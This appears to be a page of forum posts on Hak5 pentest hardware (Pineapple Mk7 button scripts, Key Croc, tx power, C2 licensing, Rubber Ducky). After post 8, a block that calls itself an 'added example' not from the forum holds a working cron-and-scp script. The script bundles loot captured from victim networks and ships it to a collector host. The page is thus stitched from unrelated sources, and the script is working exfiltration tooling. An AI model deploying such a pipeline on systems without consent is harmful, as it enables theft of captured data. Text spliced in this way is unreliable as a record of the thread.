Posts posted by chrizree

  1. Try to avoid involving any virtual environment in arming mode before you know that it actually works with a "real life" computer. Disable all other network interfaces so that the network that the Shark offers is the only network that the computer can see/connect to.

  2. Don't expect an old field guide to cover a new variant of the Pineapple even though there are similarities between them. It's like bringing forward a Nokia 8110 manual when you have a brand new iPhone. It will for sure be vague in some aspects.

    What modules have you seen in videos that you can't find? Link/reference please...

    What exact modules from previous generations would you like to have? Is it on a "nice to have basis" or on a "need to have" basis? What are you going to do with modules that are based on concepts that are obsolete since years?

    I posted this on Discord yesterday, and it's still valid to me:

    I guess the demand for modules has become some sort of "illness", as if volume itself is important ("if there's not a lot of modules, it's a bad product"), and in many cases people just don't really seem to know what they want to do with all the modules they want, they just want "a lot", because "a lot" is for some reason equal to "good". However, it's not about quantity, it's about quality and actual need.

  3. Yes, of course it is that button! You have to liberate the hacker within yourself! 😉 Don't restrict your actions; if you can't find a software button, then look for the hardware one, and if you can't see it, pick the thing apart... well... you don't need to pick the Mk7 apart since the button is there in plain sight on the "front" along with the USB ports. You may want to change the script though if you want to try it out, so that you avoid having the Mk7 reboot, perhaps something like:

    #!/bin/bash
    # Log the button press instead of the default action (which reboots the Mk7)
    echo "Hak5 WiFi Pineapple Mk7 hardware button pressed!" >> /root/mk7_btn_actions.log


    Darren also mentions it in this video:
    https://youtu.be/vR-WeW787UQ?t=153

  4. The Croc is kind of picky when it comes to keyboards sometimes. I've looped through a bunch. Some keyboards work perfectly fine, others work as a keyboard but nothing gets caught by the Croc and some keyboards just don't work at all with the Croc in between.

  5. It's the one and only button that is available on the Mk7, so no riddles when it comes to that.

    The script is located under /etc/pineapple and is called button_script

    You can edit using ssh or (as mentioned) in the web GUI of the Mk7

    Then just press the hardware button on the Mk7 and the script should execute, that's it!

  6. You need to supply more information to get some help/advice. What are you trying to verify? How are you connected to the Mk7? What steps are you doing and where do you get stuck? Have you read any documentation about the setup process on the Hak5 docs web site? Can you refer to any step described in that documentation or the videos that are published?

  7. I'm normally not in a situation chasing tx power, so I can't really tell which NICs are good for increasing tx specifically. You have to ask yourself why you want to hunt down high tx power settings. Why is it important? You don't have to tell me here in this forum, it's more a question you have to ask yourself, but I guess you have good reasons for it since you are in need of higher tx values. The only ones I got up to 30 dBm when testing were of the following chipsets; none of them are 5 GHz though.

    Ralink RT3572
    Ralink RT5370
    Ralink RT5372
    Ralink MT7601U
    Realtek RTL8192EU

  8. I guess you are still stuck in the scenario I recently posted. The server needs access to verify the license. You have to test out different scenarios to see how it behaves, but from what I've seen so far (the standalone scenario isn't something I've "opted" for since I'm only interested in running it online), C2 gets grumpy in one way or the other if taken offline. Just start the C2 instance under different circumstances and see what it reports to the command line and how the GUI acts. It will tell you how usable it is in different situations, with or without internet access. To be totally offline you would have to find a way to emulate the license validation procedure, which will most likely be both time consuming to develop and (most important) also violate any license agreement (or such). Not the way I would go, for sure.

    If you want to collect loot in some "server like" solution, I would most likely investigate the possibility for the Hak5 devices to use scp and cron (for example) to gather the loot and periodically send it to a "server" that is local (can be an RPi, another Hak5 device, etc.). I know that some/several of them do support scp and cron. Then you need to figure out how each of the Hak5 devices can reach your loot collecting "server", since they have different ways to communicate (either directly via wireless, or through a "victim" if not wireless, and in that case you need the "victim" computer(s) or the "victim" network to be connected to the loot "server" in some way). It all depends on your use case scenario.
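The scp-and-cron approach described in the post above, as an added example that is not code from the forum post or from Hak5. It stages only loot files newer than the last successful upload into a tarball, ships it with scp using a dedicated key, and only advances the "last sent" marker when scp succeeded, so a failed upload is retried on the next cron run. The loot directory, collector address, destination directory, key path and marker path are all assumptions chosen for illustration; adjust them to the device and the local collector (an RPi or similar).

```shell
#!/bin/sh
# Added example, not from the forum post: stage new loot files into a tarball and
# ship it to a local collector over scp, meant to be run from cron on the device.
# All paths, the collector address and the key file below are assumptions.
LOOT_DIR="${LOOT_DIR:-/root/loot}"                  # where the device writes loot (assumed)
COLLECTOR="${COLLECTOR:-loot@192.168.1.50}"         # local collector, e.g. an RPi (assumed)
DEST_DIR="${DEST_DIR:-/srv/loot}"                   # directory on the collector (assumed)
KEY_FILE="${KEY_FILE:-/root/.ssh/loot_collector}"   # dedicated key, not the device's main key (assumed)
SENT_MARK="${SENT_MARK:-/root/.loot_last_sent}"     # mtime of this file = time of last successful upload

# stage_loot DIR MARK OUT: pack files in DIR that are newer than MARK into OUT (tar.gz).
# MARK and OUT must be absolute paths because the function cd's into DIR.
# Returns 1 when there is nothing new, so cron runs stay quiet on idle devices.
stage_loot() {
  dir="$1"; mark="$2"; out="$3"
  list="$out.list"
  if [ -f "$mark" ]; then
    (cd "$dir" && find . -type f -newer "$mark") > "$list"
  else
    (cd "$dir" && find . -type f) > "$list"       # first run: take everything
  fi
  if [ ! -s "$list" ]; then
    rm -f "$list"
    return 1
  fi
  (cd "$dir" && tar -czf "$out" -T "$list")
  rm -f "$list"
  return 0
}

# ship_loot ARCHIVE MARK: copy the archive to the collector. The marker is only
# touched after scp succeeds, so a failed upload is retried on the next run.
# BatchMode prevents cron from hanging on a password prompt; strict host key
# checking means the collector's key must already be in known_hosts.
ship_loot() {
  archive="$1"; mark="$2"
  scp -q -i "$KEY_FILE" -o BatchMode=yes -o StrictHostKeyChecking=yes \
      "$archive" "$COLLECTOR:$DEST_DIR/" || return 1
  touch "$mark"
  rm -f "$archive"
  return 0
}

# cron_line MINUTES SCRIPT: crontab entry that runs SCRIPT every MINUTES minutes.
cron_line() {
  printf '*/%s * * * * %s run\n' "$1" "$2"
}

# Only act when invoked with "run" (as from cron); sourcing the file does nothing.
if [ "${1:-}" = "run" ]; then
  archive="/tmp/loot-$(date +%Y%m%d-%H%M%S).tgz"
  if stage_loot "$LOOT_DIR" "$SENT_MARK" "$archive"; then
    ship_loot "$archive" "$SENT_MARK" || echo "upload to $COLLECTOR failed, will retry" >&2
  fi
fi
```

Install it by adding the line printed by `cron_line 10 /root/ship_loot.sh` (path assumed) to root's crontab on the device, after generating a key pair on the device and authorizing only its public key on the collector account. On the collector side the account should be a low-privilege user that owns nothing but the destination directory, so a lost device does not hand over more than the ability to drop files there.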

  9. I guess you are stuck with a chipset, or... perhaps firmware to be more correct, that has limited the tx power to 20 dBm. I tried some different wireless NICs now, following the instructions in the 2nd link you posted, using Kali. Some adapters showed just 20 dBm, but some indicated 30 dBm. That tells me that it has nothing to do with Kali (or the method described) but is adapter specific. You have probably come across an AWUS036NHA that most likely has such a 20 dBm restriction. Are you within the EU (ETSI)? My AWUS036NHA is of the "German Revision", and since it's not possible to force the NIC above 20 dBm where other NICs have no problems indicating 30 dBm, I guess that there is an ETSI restriction applied to the hardware itself.

  10. My guess is that you get "Error undefined" just because of the very fact that you are offline/standalone. I quickly put together a standalone environment with an RPi4, a PC and a simple "home router", and all of it was totally cut off from the internet. I got the same result: "Error undefined". I then connected the local standalone network so that it got internet access, and everything was processed without any errors at all. I also captured the traffic in different stages using Wireshark, and the server communicates with online resources during setup, so it seems to be in need of internet access to be set up properly. Perhaps Hak5 wants to know that a license is used and the C2 instance "calls home" to verify/report this. Hard to tell though since it's all "cloaked" and therefore pure speculation, but the setup at least communicates with resources that can be linked to Hak5. Then it downloads things from Google-related resources as well (fonts at least), so there is a most probable dependency on internet access.

    Edit:
    Well... to take the speculation out of it all... the C2 instance needs a working internet connection to even start the server, and clearly tells you all about it when being started or if you rip the cord with the server instance started.

  11. Not recently, I did some stuff at the time when Darren released the "PIN hack" video years ago, but I've had no reason to do anything serious involving Android and the Ducky. Although I really like the Ducky concept, I would probably go with the Bunny if I needed to select one of them. The Bunny costs a bit more, but it's an easier workflow and you get more features.

  12. Well, you need to be more specific about your problem, there's a lot of text but not really telling that much... What guides are you referring to? What packages are you trying to hunt down? What OS are you on? Is it about some Hak5 device? Is it only about increasing the tx power for the NHA NIC as the title says or something more (as the text suggests, but vaguely)?

  13. OK, you have to be more specific about your setup. What environments/OS:es are you using? A virtual Ubuntu machine on a Windows host? Or some other setup? If the first scenario, are you trying to pass through the Ducky to the Ubuntu virtual machine from the Windows host? What virtualization environment do you use? VMware, VirtualBox, other? However, I don't really understand why Ubuntu and virtual environments are thrown into the mix if the 15 seconds password hack is to be used. Not sure that it will work at all though. I think you should start with something more "basic" to really verify that the Ducky works at all, since you seem to have problems even getting the bin file onto the SD card...
